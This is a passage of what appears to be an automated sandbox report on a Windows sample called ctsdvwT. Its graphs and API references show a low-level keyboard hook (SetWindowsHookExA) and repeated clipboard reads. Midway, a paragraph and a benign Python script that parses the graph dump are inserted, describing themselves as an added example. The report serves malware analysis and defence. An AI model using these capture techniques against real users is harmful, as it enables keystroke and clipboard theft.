                                            • Instruction Fuzzy Hash: 6EF0C2710093449AE7208A16CD84B62FFA8EB94339F18C95AED085F282C379A844CA71

                                            Execution Graph

                                            Execution Coverage: 10.2%
                                            Dynamic/Decrypted Code Coverage: 100%
                                            Signature Coverage: 0%
                                            Total number of Nodes: 239
                                            Total number of Limit Nodes: 26
                                            execution_graph 22835 6398998 22836 6398a00 CreateWindowExW 22835->22836 22838 6398abc 22836->22838 22838->22838 22839 639c6f8 DuplicateHandle 22840 639c78e 22839->22840 23001 1390848 23003 139084e 23001->23003 23002 139091b 23003->23002 23005 1391380 23003->23005 23007 1391396 23005->23007 23006 1391490 23006->23003 23007->23006 23012 639fbaf 23007->23012 23018 639fbc0 23007->23018 23024 63958f8 23007->23024 23030 63958f3 23007->23030 23013 639fbc8 23012->23013 23014 639fc0d 23013->23014 23036 639fc20 23013->23036 23040 639fca2 23013->23040 23044 639fc10 23013->23044 23014->23007 23019 639fbc8 23018->23019 23020 639fc0d 23019->23020 23021 639fc20 SetWindowsHookExA 23019->23021 23022 639fc10 SetWindowsHookExA 23019->23022 23023 639fca2 SetWindowsHookExA 23019->23023 23020->23007 23021->23019 23022->23019 23023->23019 23025 639590a 23024->23025 23028 63959bb 23025->23028 23052 639039c 23025->23052 23027 6395981 23058 63903bc 23027->23058 23028->23007 23031 63958f8 23030->23031 23032 639039c GetModuleHandleW 23031->23032 23034 63959bb 23031->23034 23033 6395981 23032->23033 23035 63903bc KiUserCallbackDispatcher 23033->23035 23034->23007 23035->23034 23038 639fc3d 23036->23038 23037 639fca0 23037->23013 23038->23037 23048 639ee20 23038->23048 23041 639fc5d 23040->23041 23042 639ee20 SetWindowsHookExA 23041->23042 23043 639fca0 23041->23043 23042->23041 23043->23013 23046 639fc20 23044->23046 23045 639fca0 23045->23013 23046->23045 23047 639ee20 SetWindowsHookExA 23046->23047 23047->23046 23049 639fe28 SetWindowsHookExA 23048->23049 23051 639feb2 23049->23051 23051->23038 23053 63903a7 23052->23053 23062 6396eb1 23053->23062 23072 6396de9 23053->23072 23083 6396ec0 23053->23083 23054 6395f6a 23054->23027 23059 63903c7 23058->23059 23061 639d8b3 23059->23061 23104 639c304 23059->23104 23061->23028 23063 6396eeb 23062->23063 23064 6395e44 GetModuleHandleW 23063->23064 23065 6396f52 23064->23065 23066 6396f6e 23065->23066 23071 
6395e44 GetModuleHandleW 23065->23071 23093 6397440 23065->23093 23098 6397391 23065->23098 23067 6395e54 GetModuleHandleW 23066->23067 23068 6396f9a 23066->23068 23067->23068 23071->23066 23074 6396df3 23072->23074 23073 6396e63 23074->23073 23075 6395e44 GetModuleHandleW 23074->23075 23076 6396f52 23075->23076 23077 6396f6e 23076->23077 23080 6397391 GetModuleHandleW 23076->23080 23081 6397440 GetModuleHandleW 23076->23081 23082 6395e44 GetModuleHandleW 23076->23082 23078 6395e54 GetModuleHandleW 23077->23078 23079 6396f9a 23077->23079 23078->23079 23080->23077 23081->23077 23082->23077 23084 6396eeb 23083->23084 23085 6395e44 GetModuleHandleW 23084->23085 23086 6396f52 23085->23086 23087 6396f6e 23086->23087 23090 6397391 GetModuleHandleW 23086->23090 23091 6397440 GetModuleHandleW 23086->23091 23092 6395e44 GetModuleHandleW 23086->23092 23088 6395e54 GetModuleHandleW 23087->23088 23089 6396f9a 23087->23089 23088->23089 23090->23087 23091->23087 23092->23087 23094 639746d 23093->23094 23095 63974e9 23094->23095 23096 639760f GetModuleHandleW 23094->23096 23097 6397693 GetModuleHandleW 23094->23097 23095->23066 23096->23095 23097->23095 23099 63973ab 23098->23099 23100 63973af 23098->23100 23099->23066 23101 63974e9 23100->23101 23102 639760f GetModuleHandleW 23100->23102 23103 6397693 GetModuleHandleW 23100->23103 23101->23066 23102->23101 23103->23101 23105 639d8c8 KiUserCallbackDispatcher 23104->23105 23107 639d936 23105->23107 23107->23059 23108 63978eb 23109 6397938 GetModuleHandleW 23108->23109 23110 6397932 23108->23110 23111 6397965 23109->23111 23110->23109 23112 639e140 23113 639e14b 23112->23113 23114 639e15b 23113->23114 23116 639dbb0 23113->23116 23117 639e190 OleInitialize 23116->23117 23118 639e1f4 23117->23118 23118->23114 22841 133d01c 22842 133d034 22841->22842 22843 133d08e 22842->22843 22849 6396c34 22842->22849 22853 6396c44 22842->22853 22861 639d2d2 22842->22861 22869 6398b43 22842->22869 22875 6398b50 22842->22875 22850 6396c3f 
22849->22850 22881 6396c6c 22850->22881 22852 6398c87 22852->22843 22854 6396c4f 22853->22854 22855 639d361 22854->22855 22857 639d351 22854->22857 22924 639c2ac 22855->22924 22912 639d478 22857->22912 22918 639d488 22857->22918 22858 639d35f 22862 639d2da 22861->22862 22863 639d361 22862->22863 22865 639d351 22862->22865 22864 639c2ac 2 API calls 22863->22864 22866 639d35f 22864->22866 22867 639d478 2 API calls 22865->22867 22868 639d488 2 API calls 22865->22868 22867->22866 22868->22866 22870 6398b76 22869->22870 22871 6396c34 GetModuleHandleW 22870->22871 22872 6398b82 22871->22872 22873 6396c44 2 API calls 22872->22873 22874 6398b97 22873->22874 22874->22843 22876 6398b76 22875->22876 22877 6396c34 GetModuleHandleW 22876->22877 22878 6398b82 22877->22878 22879 6396c44 2 API calls 22878->22879 22880 6398b97 22879->22880 22880->22843 22882 6396c77 22881->22882 22887 6395e44 22882->22887 22884 6398ce9 22886 6398d57 22884->22886 22892 6395e54 22884->22892 22889 6395e4f 22887->22889 22888 63973ab 22888->22884 22889->22888 22896 639760f 22889->22896 22904 6397693 22889->22904 22893 63978f0 GetModuleHandleW 22892->22893 22895 6397965 22893->22895 22895->22886 22897 639761a 22896->22897 22898 6395e54 GetModuleHandleW 22897->22898 22899 639773a 22898->22899 22900 6395e54 GetModuleHandleW 22899->22900 22903 63977b4 22899->22903 22901 6397788 22900->22901 22902 6395e54 GetModuleHandleW 22901->22902 22901->22903 22902->22903 22903->22888 22906 6397696 22904->22906 22905 6395e54 GetModuleHandleW 22907 6397788 22905->22907 22908 6395e54 GetModuleHandleW 22906->22908 22910 63977b4 22906->22910 22911 639773a 22906->22911 22909 6395e54 GetModuleHandleW 22907->22909 22907->22910 22908->22911 22909->22910 22910->22888 22911->22905 22911->22910 22914 639d488 22912->22914 22913 639c2ac 2 API calls 22913->22914 22914->22913 22915 639d56e 22914->22915 22931 639d958 22914->22931 22936 639d968 22914->22936 22915->22858 22920 639d496 22918->22920 22919 639c2ac 2 API calls 22919->22920 
22920->22919 22921 639d56e 22920->22921 22922 639d968 OleGetClipboard 22920->22922 22923 639d958 OleGetClipboard 22920->22923 22921->22858 22922->22920 22923->22920 22925 639c2b7 22924->22925 22926 639d5ca 22925->22926 22927 639d674 22925->22927 22928 639d622 CallWindowProcW 22926->22928 22929 639d5d1 22926->22929 22930 6396c44 OleGetClipboard 22927->22930 22928->22929 22929->22858 22930->22929 22932 639d987 22931->22932 22933 639da20 22932->22933 22941 639dedf 22932->22941 22959 639df20 22932->22959 22933->22914 22937 639d987 22936->22937 22938 639da20 22937->22938 22939 639dedf OleGetClipboard 22937->22939 22940 639df20 OleGetClipboard 22937->22940 22938->22914 22939->22937 22940->22937 22942 639dee5 22941->22942 22945 639df3c 22941->22945 22943 639df61 22942->22943 22947 639def5 22942->22947 22944 639df95 22943->22944 22948 639dfd9 22943->22948 22956 639df68 OleGetClipboard 22944->22956 22957 639df58 OleGetClipboard 22944->22957 22958 639dedf OleGetClipboard 22944->22958 22945->22932 22946 639df9b 22946->22932 22947->22945 22955 639dedf OleGetClipboard 22947->22955 22965 639df68 22947->22965 22977 639df58 22947->22977 22949 639e059 22948->22949 22989 639e230 22948->22989 22993 639e220 22948->22993 22949->22932 22950 639e077 22950->22932 22955->22945 22956->22946 22957->22946 22958->22946 22960 639df28 22959->22960 22961 639df3c 22960->22961 22962 639df68 OleGetClipboard 22960->22962 22963 639df58 OleGetClipboard 22960->22963 22964 639dedf OleGetClipboard 22960->22964 22961->22932 22962->22961 22963->22961 22964->22961 22966 639df7a 22965->22966 22967 639df95 22966->22967 22969 639dfd9 22966->22969 22972 639df68 OleGetClipboard 22967->22972 22973 639df58 OleGetClipboard 22967->22973 22974 639dedf OleGetClipboard 22967->22974 22968 639df9b 22968->22945 22971 639e059 22969->22971 22975 639e230 OleGetClipboard 22969->22975 22976 639e220 OleGetClipboard 22969->22976 22970 639e077 22970->22945 22971->22945 22972->22968 22973->22968 22974->22968 22975->22970 
22976->22970 22978 639df68 22977->22978 22979 639df95 22978->22979 22981 639dfd9 22978->22981 22986 639df68 OleGetClipboard 22979->22986 22987 639df58 OleGetClipboard 22979->22987 22988 639dedf OleGetClipboard 22979->22988 22980 639df9b 22980->22945 22983 639e059 22981->22983 22984 639e230 OleGetClipboard 22981->22984 22985 639e220 OleGetClipboard 22981->22985 22982 639e077 22982->22945 22983->22945 22984->22982 22985->22982 22986->22980 22987->22980 22988->22980 22991 639e245 22989->22991 22992 639e26b 22991->22992 22997 639dcc8 22991->22997 22992->22950 22995 639e230 22993->22995 22994 639dcc8 OleGetClipboard 22994->22995 22995->22994 22996 639e26b 22995->22996 22996->22950 22998 639e2d8 OleGetClipboard 22997->22998 23000 639e372 22998->23000
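The execution_graph dump above, and the control_flow_graph dumps that follow it, are flattened adjacency lists: a node is a decimal id followed by a hex address (an address range for a basic block), then optional label words such as a Win32 API name, `call <addr>`, or a collapsed `N API calls`; edges appear as `src->dst`. The script below is an added example, not part of the Joe Sandbox report, that parses an excerpt of the dump into a graph and lists which APIs each entry node can reach, which is how the SetWindowsHookExA and OleGetClipboard chains in the graph map to the keyboard-hook and clipboard-capture signatures in the report's overview. The sample strings are constructed from the text above, and the token heuristics (an address is 6 to 8 hex digits, optionally a start-end range; `N API calls` marks a collapsed subgraph with no names) are assumptions drawn from this page's format, not a documented Joe Sandbox schema.

```python
import re
from collections import defaultdict

# Constructed excerpt of the execution_graph dump above (a few chains, not the
# whole 239-node graph); whitespace-separated tokens, edges written as src->dst.
SAMPLE = (
    "22835 6398998 22836 6398a00 CreateWindowExW 22835->22836 22838 6398abc 22836->22838 22838->22838 "
    "22839 639c6f8 DuplicateHandle 22840 639c78e 22839->22840 "
    "23018 639fbc0 23019 639fbc8 23018->23019 23020 639fc0d 23019->23020 "
    "23021 639fc20 SetWindowsHookExA 23019->23021 23022 639fc10 SetWindowsHookExA 23019->23022 23021->23019 "
    "23030 63958f3 23031 63958f8 23030->23031 23032 639039c GetModuleHandleW 23031->23032 "
    "23033 6395981 23032->23033 23035 63903bc KiUserCallbackDispatcher 23033->23035 "
    "22861 639d2d2 22862 639d2da 22861->22862 22863 639d361 22862->22863 "
    "22864 639c2ac 2 API calls 22863->22864 22866 639d35f 22864->22866"
)

# Constructed excerpt of one control_flow_graph dump above: basic blocks carry an
# address range and an optional "call <addr>" label instead of an API name.
CFG_SAMPLE = (
    "1240 1394a21-1394a25 1239 1394a2f-1394a33 1240->1239 "
    "1241 1394a27-1394a2a call 1390ab8 1240->1241 1241->1239"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID_RE = re.compile(r"^\d+$")
# Assumption: an address is 6-8 hex digits, optionally a start-end range (CFG blocks).
ADDR_RE = re.compile(r"^[0-9a-f]{6,8}(?:-[0-9a-f]{6,8})?$")
# Win32 export names as they appear in the dump (CamelCase, e.g. SetWindowsHookExA).
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]+$")


def parse_graph(text):
    """Return (nodes, edges): nodes maps id -> {"addr", "label"}, edges maps id -> set(ids)."""
    tokens = text.split()
    nodes, edges = {}, defaultdict(set)
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:
            edges[m.group(1)].add(m.group(2))
            i += 1
            continue
        # A node starts with a decimal id followed by an address token; requiring the
        # address keeps the "2" of a "2 API calls" label from becoming a new node.
        if NODE_ID_RE.match(tok) and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            current = tok
            nodes[current] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if current is not None:
            nodes[current]["label"].append(tok)
        i += 1
    return nodes, edges


def node_apis(label):
    """API names on one node; "N API calls" is a collapsed subgraph that carries no names."""
    if re.fullmatch(r"\d+ API calls", " ".join(label)):
        return []
    return [w for w in label if API_RE.match(w)]


def entry_points(nodes, edges):
    """Nodes with no incoming edge: the roots each chain in the dump starts from."""
    targets = {dst for dsts in edges.values() for dst in dsts}
    return sorted(n for n in nodes if n not in targets)


def reachable_apis(nodes, edges, root):
    """Every API name reachable from root; the seen set tolerates cycles and self-loops."""
    seen, stack, apis = set(), [root], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        apis.update(node_apis(nodes.get(n, {"label": []})["label"]))
        stack.extend(edges.get(n, ()))
    return sorted(apis)


def summarize(text):
    """Map each entry address to the sorted list of APIs its chain can reach."""
    nodes, edges = parse_graph(text)
    return {nodes[r]["addr"]: reachable_apis(nodes, edges, r) for r in entry_points(nodes, edges)}


def called_functions(nodes):
    """Targets of "call <addr>" labels in a control-flow graph dump."""
    out = set()
    for node in nodes.values():
        lab = node["label"]
        out.update(lab[i + 1] for i, w in enumerate(lab) if w == "call" and i + 1 < len(lab))
    return sorted(out)


if __name__ == "__main__":
    for addr, apis in summarize(SAMPLE).items():
        print(addr, ", ".join(apis) or "(no named API)")
    print("CFG callees:", called_functions(parse_graph(CFG_SAMPLE)[0]))
```

Running it on the full execution_graph text (paste it into SAMPLE) gives one line per root address: the chain rooted at 1390848 resolves to SetWindowsHookExA, GetModuleHandleW and KiUserCallbackDispatcher, and the chain rooted at 133d01c to OleGetClipboard, CallWindowProcW and GetModuleHandleW. Nodes labelled `N API calls` are places where the report collapsed a subgraph, so a chain that only reaches such nodes reports no names even though calls are present; treat an empty list as "not shown here", not as "no API activity".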
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,buq
                                            • API String ID: 0-4122549453
                                            • Opcode ID: 3e693ef4b52828504668803515a93a8bd986f70623f59f245a736fda154f4d11
                                            • Instruction ID: 072443d1d1bca95d070098d40d08be0d63341e10cfc64d5caf50683651412c8b
                                            • Opcode Fuzzy Hash: 3e693ef4b52828504668803515a93a8bd986f70623f59f245a736fda154f4d11
                                            • Instruction Fuzzy Hash: 5833FB31D1071A8EDB11EF68C88069DF7B1FF99300F15D69AD459AB221EB70AAC5CF81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5c0d0206d821756332c4b8b815f1e8d068fb1380d8f6c095f22908c4ccc79985
                                            • Instruction ID: c263c5ed0a56e59b7bba396cb231dd88c8e5a1f626162dc1b9d11f2104f29da9
                                            • Opcode Fuzzy Hash: 5c0d0206d821756332c4b8b815f1e8d068fb1380d8f6c095f22908c4ccc79985
                                            • Instruction Fuzzy Hash: 9A53F631C10B1A8ACB51EF68C8905A9F7B1FF99300F15D79AE45977221FB70AAD4CB81
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l
                                            • API String ID: 0-253765261
                                            • Opcode ID: 1078683f1919766829b85aea492888f7bcfaedb9849b543ab44484a0883bc748
                                            • Instruction ID: 088f07186c726f960136508be4ad1c2719dde8ca1e8d14d344eaf32feaa47190
                                            • Opcode Fuzzy Hash: 1078683f1919766829b85aea492888f7bcfaedb9849b543ab44484a0883bc748
                                            • Instruction Fuzzy Hash: 22914EB0E00209DFDF14CFA9D99579EBBF2BF88318F148129E455A7254EB749886CB81
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 29a5d706efae16f7a433f7b0c0b51a9fdc868a33ba121c21c58f87718d5c769c
                                            • Instruction ID: 34dfea092e8e09d3081db182f5b450cb877f34a82be1a5dec60d358a2698f442
                                            • Opcode Fuzzy Hash: 29a5d706efae16f7a433f7b0c0b51a9fdc868a33ba121c21c58f87718d5c769c
                                            • Instruction Fuzzy Hash: E5B18E70E102498FDF14CFADDA8179DBBF2AF88318F148529D858E7294EB749846CF81

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1206 1394820-13948ac 1209 13948ae-13948b9 1206->1209 1210 13948f6-13948f8 1206->1210 1209->1210 1212 13948bb-13948c7 1209->1212 1211 13948fa-1394912 1210->1211 1218 139495c-139495e 1211->1218 1219 1394914-139491f 1211->1219 1213 13948c9-13948d3 1212->1213 1214 13948ea-13948f4 1212->1214 1216 13948d5 1213->1216 1217 13948d7-13948e6 1213->1217 1214->1211 1216->1217 1217->1217 1220 13948e8 1217->1220 1222 1394960-13949a5 1218->1222 1219->1218 1221 1394921-139492d 1219->1221 1220->1214 1223 139492f-1394939 1221->1223 1224 1394950-139495a 1221->1224 1230 13949ab-13949b9 1222->1230 1225 139493b 1223->1225 1226 139493d-139494c 1223->1226 1224->1222 1225->1226 1226->1226 1228 139494e 1226->1228 1228->1224 1231 13949bb-13949c1 1230->1231 1232 13949c2-1394a1f 1230->1232 1231->1232 1239 1394a2f-1394a33 1232->1239 1240 1394a21-1394a25 1232->1240 1242 1394a43-1394a47 1239->1242 1243 1394a35-1394a39 1239->1243 1240->1239 1241 1394a27-1394a2a call 1390ab8 1240->1241 1241->1239 1246 1394a49-1394a4d 1242->1246 1247 1394a57-1394a5b 1242->1247 1243->1242 1245 1394a3b-1394a3e call 1390ab8 1243->1245 1245->1242 1246->1247 1249 1394a4f 1246->1249 1250 1394a6b 1247->1250 1251 1394a5d-1394a61 1247->1251 1249->1247 1253 1394a6c 1250->1253 1251->1250 1252 1394a63 1251->1252 1252->1250 1253->1253
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l$\V|l
                                            • API String ID: 0-2952616358
                                            • Opcode ID: 870ae6b316aede5680461b0c2bce69102d9e6161c1ec04ae4c060bba60a777d8
                                            • Instruction ID: f205be2071fdc71a2b559e8577b369e639e1937317499f44a73601add30c0366
                                            • Opcode Fuzzy Hash: 870ae6b316aede5680461b0c2bce69102d9e6161c1ec04ae4c060bba60a777d8
                                            • Instruction Fuzzy Hash: 10718EB1E00349CFDF14CFADD98079EBBF2AF88318F148129E415AB254EB349846CB95

                                            Control-flow Graph

                                            control_flow_graph 1254 1394814-13948ac 1257 13948ae-13948b9 1254->1257 1258 13948f6-13948f8 1254->1258 1257->1258 1260 13948bb-13948c7 1257->1260 1259 13948fa-1394912 1258->1259 1266 139495c-139495e 1259->1266 1267 1394914-139491f 1259->1267 1261 13948c9-13948d3 1260->1261 1262 13948ea-13948f4 1260->1262 1264 13948d5 1261->1264 1265 13948d7-13948e6 1261->1265 1262->1259 1264->1265 1265->1265 1268 13948e8 1265->1268 1270 1394960-1394972 1266->1270 1267->1266 1269 1394921-139492d 1267->1269 1268->1262 1271 139492f-1394939 1269->1271 1272 1394950-139495a 1269->1272 1277 1394979-13949a5 1270->1277 1273 139493b 1271->1273 1274 139493d-139494c 1271->1274 1272->1270 1273->1274 1274->1274 1276 139494e 1274->1276 1276->1272 1278 13949ab-13949b9 1277->1278 1279 13949bb-13949c1 1278->1279 1280 13949c2-1394a1f 1278->1280 1279->1280 1287 1394a2f-1394a33 1280->1287 1288 1394a21-1394a25 1280->1288 1290 1394a43-1394a47 1287->1290 1291 1394a35-1394a39 1287->1291 1288->1287 1289 1394a27-1394a2a call 1390ab8 1288->1289 1289->1287 1294 1394a49-1394a4d 1290->1294 1295 1394a57-1394a5b 1290->1295 1291->1290 1293 1394a3b-1394a3e call 1390ab8 1291->1293 1293->1290 1294->1295 1297 1394a4f 1294->1297 1298 1394a6b 1295->1298 1299 1394a5d-1394a61 1295->1299 1297->1295 1301 1394a6c 1298->1301 1299->1298 1300 1394a63 1299->1300 1300->1298 1301->1301
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4138936539.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_1390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: \V|l$\V|l
                                            • API String ID: 0-2952616358
                                            • Opcode ID: 5fb78871d9736dd4d327ef5e660cbbc6d2c5789a12286dbd42e8e9f2a944b26c
                                            • Instruction ID: d860be39c426a4d707d15c83ee53d9f287414ff2ce6b2eb4e3cb9052014d1970
                                            • Opcode Fuzzy Hash: 5fb78871d9736dd4d327ef5e660cbbc6d2c5789a12286dbd42e8e9f2a944b26c
                                            • Instruction Fuzzy Hash: B4717EB1E002499FDF10CFA8D9857DEBFF1AF88318F148129E419AB254EB349846CB95

                                            Control-flow Graph

                                            control_flow_graph 1442 6398993-6398994 1443 6398921-6398945 1442->1443 1444 6398996-63989fe 1442->1444 1445 6398a09-6398a10 1444->1445 1446 6398a00-6398a06 1444->1446 1447 6398a1b-6398a53 1445->1447 1448 6398a12-6398a18 1445->1448 1446->1445 1450 6398a5b-6398aba CreateWindowExW 1447->1450 1448->1447 1451 6398abc-6398ac2 1450->1451 1452 6398ac3-6398afb 1450->1452 1451->1452 1456 6398b08 1452->1456 1457 6398afd-6398b00 1452->1457 1458 6398b09 1456->1458 1457->1456 1458->1458
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06398AAA
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 379da3afaa54526ec2716f21a34aae4bad83d9d92f40d31b60c272a21859cf57
                                            • Instruction ID: 0fd04c32b3dc3390d25f583e507283aad62ed5511cc36fc684ca5f44c7c3c1ba
                                            • Opcode Fuzzy Hash: 379da3afaa54526ec2716f21a34aae4bad83d9d92f40d31b60c272a21859cf57
                                            • Instruction Fuzzy Hash: C85123B0C04349AFDF15CFA9C880ACEBFB5BF49300F24856AE458AB251D7749885CF91

                                            Control-flow Graph: CreateWindowExW (graph image not extracted)
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 06398AAA
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0

                                            Control-flow Graph: CallWindowProcW (graph image not extracted)
                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0639D649
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0

                                            Control-flow Graph: OleGetClipboard (graph image not extracted)
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0

                                            Control-flow Graph: OleGetClipboard (graph image not extracted)
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0

                                            Control-flow Graph: SetWindowsHookExA (graph image not extracted)
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0639FC90,00000000,00000000), ref: 0639FEA3
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0

                                            Control-flow Graph: DuplicateHandle (graph image not extracted)
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639C77F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639C77F
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0639FC90,00000000,00000000), ref: 0639FEA3
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06397956
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06397956
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0639E1E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0639D89D), ref: 0639D927
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0639E1E5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.4146687096.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_6390000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            APIs
